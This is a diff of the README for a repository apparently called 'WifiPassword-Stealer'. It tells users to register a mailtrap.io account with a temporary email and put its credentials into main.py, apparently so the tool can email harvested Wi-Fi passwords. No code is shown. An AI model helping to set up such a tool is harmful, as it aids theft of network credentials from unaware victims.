aydinnyunus/WifiPassword-Stealer/README.md

 ## USAGE TEMP MAIL

 Register an account on this site "https://mailtrap.io/" using a temp mail.
-Get the Username,Password and put them in the "main.py" username and password part.Set E-MAIL to your Temp Mail.
+Get the Username,Password and put them in the "main.py" username and password part.

 ![github-small](/images/dene.png)